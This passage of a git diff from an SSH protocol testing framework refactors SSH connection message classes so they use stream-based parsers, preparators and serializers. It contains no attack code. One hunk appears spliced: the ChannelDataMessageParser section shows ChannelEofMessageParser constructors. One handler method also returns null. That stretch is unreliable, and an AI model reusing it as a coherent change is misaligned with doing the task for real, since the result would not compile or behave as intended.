java.io.InputStream; public class ChannelSuccessMessage extends ChannelMessage { @Override public ChannelSuccessMessageHandler getHandler(SshContext context) { - return new ChannelSuccessMessageHandler(context, this); + return new ChannelSuccessMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new ChannelSuccessMessageParser(stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new ChannelSuccessMessagePreparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new ChannelMessageSerializer<>(this); + } + + @Override + public String toShortString() { + return "CH_SUCCESS"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelWindowAdjustMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelWindowAdjustMessage.java index 6e139a4b0..552ed01d9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelWindowAdjustMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelWindowAdjustMessage.java @@ -9,8 +9,12 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; -import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelWindowAdjustMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelWindowAdjustMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelWindowAdjustMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelWindowAdjustMessageSerializer; +import java.io.InputStream; public class ChannelWindowAdjustMessage extends ChannelMessage { @@ -29,7 +33,32 @@ public void setBytesToAdd(int bytesToAdd) { } @Override - public ChannelWindowAdjustMessageHandler getHandler(SshContext context) { - return new ChannelWindowAdjustMessageHandler(context, this); + public ChannelWindowAdjustMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelWindowAdjustMessageParser(stream); + } + + /* @Override + public ChannelWindowAdjustMessageParser getParser(byte[] array, int startPosition) { + return new ChannelWindowAdjustMessageParser(array, startPosition); + }*/ + + @Override + public ChannelWindowAdjustMessagePreparator getPreparator(SshContext context) { + return new ChannelWindowAdjustMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelWindowAdjustMessageSerializer getSerializer(SshContext context) { + return new ChannelWindowAdjustMessageSerializer(this); + } + + @Override + public String toShortString() { + return "CH_WINDOW_ADJ"; + } + + @Override + public SshMessageHandler getHandler(SshContext context) { + return null; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestCancelTcpIpForwardMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestCancelTcpIpForwardMessage.java index 1c3a49c6f..053f73ce1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestCancelTcpIpForwardMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestCancelTcpIpForwardMessage.java @@ -10,8 +10,15 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.connection.handler.GlobalRequestCancelTcpIpForwardMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestCancelTcpIpForwardMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.GlobalRequestCancelTcpIpForwardlMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.GlobalRequestCancelTcpIpForwardlMessageSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class GlobalRequestCancelTcpIpForwardMessage @@ -79,6 +86,29 @@ public void setPortToBind(Integer portToBind) { @Override public GlobalRequestCancelTcpIpForwardMessageHandler getHandler(SshContext context) { - return new GlobalRequestCancelTcpIpForwardMessageHandler(context, this); + return new GlobalRequestCancelTcpIpForwardMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new GlobalRequestCancelTcpIpForwardMessageParser(stream); + } + + @Override + public SshMessagePreparator getPreparator( + SshContext context) { + return new GlobalRequestCancelTcpIpForwardlMessagePreparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer( + SshContext context) { + return new GlobalRequestCancelTcpIpForwardlMessageSerializer(this); + } + + @Override + public String toShortString() { + return "RQ_CANCLE_TCPIP_FW"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestFailureMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestFailureMessage.java index 44d2a6c59..78f1430dc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestFailureMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestFailureMessage.java @@ -7,13 +7,37 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.GlobalRequestFailureMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestFailureMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.GlobalRequestFailureMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.GlobalRequestFailureMessageSerializer; +import java.io.InputStream; public class GlobalRequestFailureMessage extends ChannelMessage { @Override public GlobalRequestFailureMessageHandler getHandler(SshContext context) { - return new GlobalRequestFailureMessageHandler(context, this); + return new GlobalRequestFailureMessageHandler(context); + } + + @Override + public GlobalRequestFailureMessageParser getParser(SshContext context, InputStream stream) { + return new GlobalRequestFailureMessageParser(stream); + } + + @Override + public GlobalRequestFailureMessagePreparator getPreparator(SshContext context) { + return new GlobalRequestFailureMessagePreparator(context.getChooser(), this); + } + + @Override + public GlobalRequestFailureMessageSerializer getSerializer(SshContext context) { + return new GlobalRequestFailureMessageSerializer(this); + } + + @Override + public String toShortString() { + return "REQ_FAILURE"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestNoMoreSessionsMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestNoMoreSessionsMessage.java index 4c33dc322..51c415e7a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestNoMoreSessionsMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestNoMoreSessionsMessage.java @@ -7,14 +7,39 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.GlobalRequestNoMoreSessionsMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestNoMoreSessionsMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.GlobalRequestNoMoreSessionsMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.GlobalRequestNoMoreSessionsMessageSerializer; +import java.io.InputStream; public class GlobalRequestNoMoreSessionsMessage extends GlobalRequestMessage { @Override public GlobalRequestNoMoreSessionsMessageHandler getHandler(SshContext context) { - return new GlobalRequestNoMoreSessionsMessageHandler(context, this); + return new GlobalRequestNoMoreSessionsMessageHandler(context); + } + + @Override + public GlobalRequestNoMoreSessionsMessageParser getParser( + SshContext context, InputStream stream) { + return new GlobalRequestNoMoreSessionsMessageParser(stream); + } + + @Override + public GlobalRequestNoMoreSessionsMessagePreparator getPreparator(SshContext context) { + return new GlobalRequestNoMoreSessionsMessagePreparator(context.getChooser(), this); + } + + @Override + public GlobalRequestNoMoreSessionsMessageSerializer getSerializer(SshContext context) { + return new GlobalRequestNoMoreSessionsMessageSerializer(this); + } + + @Override + public String toShortString() { + return "REQ_NO_MORE_SESSIONS"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestOpenSshHostKeysMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestOpenSshHostKeysMessage.java index 83c9befc2..05b650c33 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestOpenSshHostKeysMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestOpenSshHostKeysMessage.java @@ -12,9 +12,16 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.crypto.util.PublicKeyHelper; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.connection.handler.GlobalRequestOpenSshHostKeysMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestOpenSshHostKeysMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.GlobalRequestOpenSshHostKeysMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.GlobalRequestOpenSshHostKeysMessageSerializer; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.InputStream; import java.util.List; public class GlobalRequestOpenSshHostKeysMessage @@ -41,7 +48,25 @@ public void setHostKeys(final List> hostKeys) { @Override public GlobalRequestOpenSshHostKeysMessageHandler getHandler(SshContext context) { - return new GlobalRequestOpenSshHostKeysMessageHandler(context, this); + return new GlobalRequestOpenSshHostKeysMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new GlobalRequestOpenSshHostKeysMessageParser(stream); + } + + @Override + public SshMessagePreparator getPreparator( + SshContext context) { + return new GlobalRequestOpenSshHostKeysMessagePreparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer( + SshContext context) { + return new GlobalRequestOpenSshHostKeysMessageSerializer(this); } /** @@ -58,4 +83,9 @@ private static byte[] encodeKeys(final List> keys) { .reduce(ArrayConverter::concatenate) .orElseGet(() -> new byte[0]); } + + @Override + public String toShortString() { + return "OPENSSH"; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestSuccessMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestSuccessMessage.java index 2ae8e9d31..b764de6b7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestSuccessMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestSuccessMessage.java @@ -7,13 +7,39 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.handler.GlobalRequestSuccessMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestSuccessMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.GlobalRequestSuccessMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.GlobalRequestSuccessMessageSerializer; +import java.io.InputStream; public class GlobalRequestSuccessMessage extends ChannelMessage { @Override public GlobalRequestSuccessMessageHandler getHandler(SshContext context) { - return new GlobalRequestSuccessMessageHandler(context, this); + return new GlobalRequestSuccessMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new GlobalRequestSuccessMessageParser(stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new GlobalRequestSuccessMessagePreparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new GlobalRequestSuccessMessageSerializer(this); + } + + @Override + public String toShortString() { + return "REQ_SUCCESS"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestTcpIpForwardMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestTcpIpForwardMessage.java index 91469faa4..aaf5568e9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestTcpIpForwardMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestTcpIpForwardMessage.java @@ -10,8 +10,15 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.connection.handler.GlobalRequestTcpIpForwardMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestTcpIpForwardMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.GlobalRequestTcpIpForwardMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.GlobalRequestTcpIpForwardMessageSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class GlobalRequestTcpIpForwardMessage @@ -79,6 +86,29 @@ public void setPortToBind(Integer portToBind) { @Override public GlobalRequestTcpIpForwardMessageHandler getHandler(SshContext context) { - return new GlobalRequestTcpIpForwardMessageHandler(context, this); + return new GlobalRequestTcpIpForwardMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new GlobalRequestTcpIpForwardMessageParser(stream); + } + + @Override + public SshMessagePreparator getPreparator( + SshContext context) { + return new GlobalRequestTcpIpForwardMessagePreparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer( + SshContext context) { + return new GlobalRequestTcpIpForwardMessageSerializer(this); + } + + @Override + public String toShortString() { + return "TCPIP_FW"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestUnknownMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestUnknownMessage.java index 4a57ad0b6..518cf87d8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestUnknownMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestUnknownMessage.java @@ -9,8 +9,12 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.GlobalRequestUnknownMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestUnknownMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.GlobalRequestUnknownMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.GlobalRequestUnknownMessageSerializer; +import java.io.InputStream; public class GlobalRequestUnknownMessage extends GlobalRequestMessage { @@ -31,6 +35,26 @@ public void setTypeSpecificData(ModifiableByteArray typeSpecificData) { @Override public GlobalRequestUnknownMessageHandler getHandler(SshContext context) { - return new GlobalRequestUnknownMessageHandler(context, this); + return new GlobalRequestUnknownMessageHandler(context); + } + + @Override + public GlobalRequestUnknownMessageParser getParser(SshContext context, InputStream stream) { + return new GlobalRequestUnknownMessageParser(stream); + } + + @Override + public GlobalRequestUnknownMessagePreparator getPreparator(SshContext context) { + return new GlobalRequestUnknownMessagePreparator(context.getChooser(), this); + } + + @Override + public GlobalRequestUnknownMessageSerializer getSerializer(SshContext context) { + return new GlobalRequestUnknownMessageSerializer(this); + } + + @Override + public String toShortString() { + return "REQ_UNKONW"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java index 0b6bb6ab1..176dbf0ff 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java @@ -8,15 +8,26 @@ package de.rub.nds.sshattacker.core.protocol.connection.parser; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelCloseMessage; +import java.io.InputStream; public class ChannelCloseMessageParser extends ChannelMessageParser { - public ChannelCloseMessageParser(byte[] array) { - super(array); + /* + public ChannelCloseMessageParser(byte[] array) { + super(array); + } + public ChannelCloseMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelCloseMessageParser(InputStream stream) { + super(stream); } - public ChannelCloseMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelCloseMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java index 830517376..f23fb44ea 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java @@ -10,6 +10,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelDataMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -17,12 +18,22 @@ public class ChannelDataMessageParser extends ChannelMessageParser { - public ChannelEofMessageParser(byte[] array) { - super(array); + /* + public ChannelEofMessageParser(byte[] array) { + super(array); + } + public ChannelEofMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelEofMessageParser(InputStream stream) { + super(stream); } - public ChannelEofMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelEofMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java index f1e6991ee..b2380dade 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java @@ -11,18 +11,30 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.constants.ExtendedChannelDataType; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelExtendedDataMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class ChannelExtendedDataMessageParser extends ChannelMessageParser { - public ChannelExtendedDataMessageParser(byte[] array) { - super(array); + /* + public ChannelExtendedDataMessageParser(byte[] array) { + super(array); + } + public ChannelExtendedDataMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + + */ + + public ChannelExtendedDataMessageParser(InputStream stream) { + super(stream); } - public ChannelExtendedDataMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelExtendedDataMessage message) { + parseMessageSpecificContents(); } private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java index fdc0e8f3a..9ff1d4583 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java @@ -8,15 +8,26 @@ package de.rub.nds.sshattacker.core.protocol.connection.parser; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelFailureMessage; +import java.io.InputStream; public class ChannelFailureMessageParser extends ChannelMessageParser { - public ChannelFailureMessageParser(byte[] array) { - super(array); + /* + public ChannelFailureMessageParser(byte[] array) { + super(array); + } + public ChannelFailureMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelFailureMessageParser(InputStream stream) { + super(stream); } - public ChannelFailureMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelFailureMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelMessageParser.java index 01ed7edde..6b0849ff3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelMessageParser.java @@ -10,6 +10,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -18,12 +19,15 @@ public abstract class ChannelMessageParser> private static final Logger LOGGER = LogManager.getLogger(); - public ChannelMessageParser(byte[] array) { + /*public ChannelMessageParser(byte[] array) { super(array); } - public ChannelMessageParser(byte[] array, int startPosition) { super(array, startPosition); + }*/ + + public ChannelMessageParser(InputStream stream) { + super(stream); } private void parseRecipientChannel() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java index f2aab45b5..a0b6eb4fa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java @@ -9,6 +9,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenConfirmationMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -17,12 +18,21 @@ public class ChannelOpenConfirmationMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public ChannelOpenConfirmationMessageParser(byte[] array) { + /*public ChannelOpenConfirmationMessageParser(byte[] array) { super(array); } public ChannelOpenConfirmationMessageParser(byte[] array, int startPosition) { super(array, startPosition); + }*/ + + @Override + public void parse(ChannelOpenConfirmationMessage message) { + parseMessageSpecificContents(); + } + + public ChannelOpenConfirmationMessageParser(InputStream stream) { + super(stream); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java index 93bdcbd6f..fe81771a3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenFailureMessage; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -20,12 +21,20 @@ public class ChannelOpenFailureMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public ChannelOpenFailureMessageParser(byte[] array) { + /*public ChannelOpenFailureMessageParser(byte[] array) { super(array); } - public ChannelOpenFailureMessageParser(byte[] array, int startPosition) { super(array, startPosition); + }*/ + + public ChannelOpenFailureMessageParser(InputStream stream) { + super(stream); + } + + @Override + public void parse(ChannelOpenFailureMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenMessageParser.java index d59b8f9e7..d8f78e4bf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenMessageParser.java @@ -12,6 +12,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenMessage; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -21,12 +22,14 @@ public abstract class ChannelOpenMessageParser> private static final Logger LOGGER = LogManager.getLogger(); - public ChannelOpenMessageParser(byte[] array) { + /* public ChannelOpenMessageParser(byte[] array) { super(array); } - public ChannelOpenMessageParser(byte[] array, int startPosition) { super(array, startPosition); + }*/ + public ChannelOpenMessageParser(InputStream stream) { + super(stream); } public void parseChannelType() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParser.java index 8baa6cd1b..13c06a003 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParser.java @@ -8,15 +8,26 @@ package de.rub.nds.sshattacker.core.protocol.connection.parser; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenSessionMessage; +import java.io.InputStream; public class ChannelOpenSessionMessageParser extends ChannelOpenMessageParser { - public ChannelOpenSessionMessageParser(byte[] array) { - super(array); + /* + public ChannelOpenSessionMessageParser(byte[] array) { + super(array); + } + public ChannelOpenSessionMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelOpenSessionMessageParser(InputStream stream) { + super(stream); } - public ChannelOpenSessionMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelOpenSessionMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenUnknownMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenUnknownMessageParser.java index c1cfb56f9..dca141cfd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenUnknownMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenUnknownMessageParser.java @@ -9,6 +9,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenUnknownMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -16,12 +17,23 @@ public class ChannelOpenUnknownMessageParser extends ChannelOpenMessageParser { private static final Logger LOGGER = LogManager.getLogger(); - public ChannelOpenUnknownMessageParser(byte[] array) { - super(array); + /* + public ChannelOpenUnknownMessageParser(byte[] array) { + super(array); + } + + public ChannelOpenUnknownMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public ChannelOpenUnknownMessageParser(InputStream stream) { + super(stream); } - public ChannelOpenUnknownMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(ChannelOpenUnknownMessage message) { + parseMessageSpecificContents(); } @Override diff --git 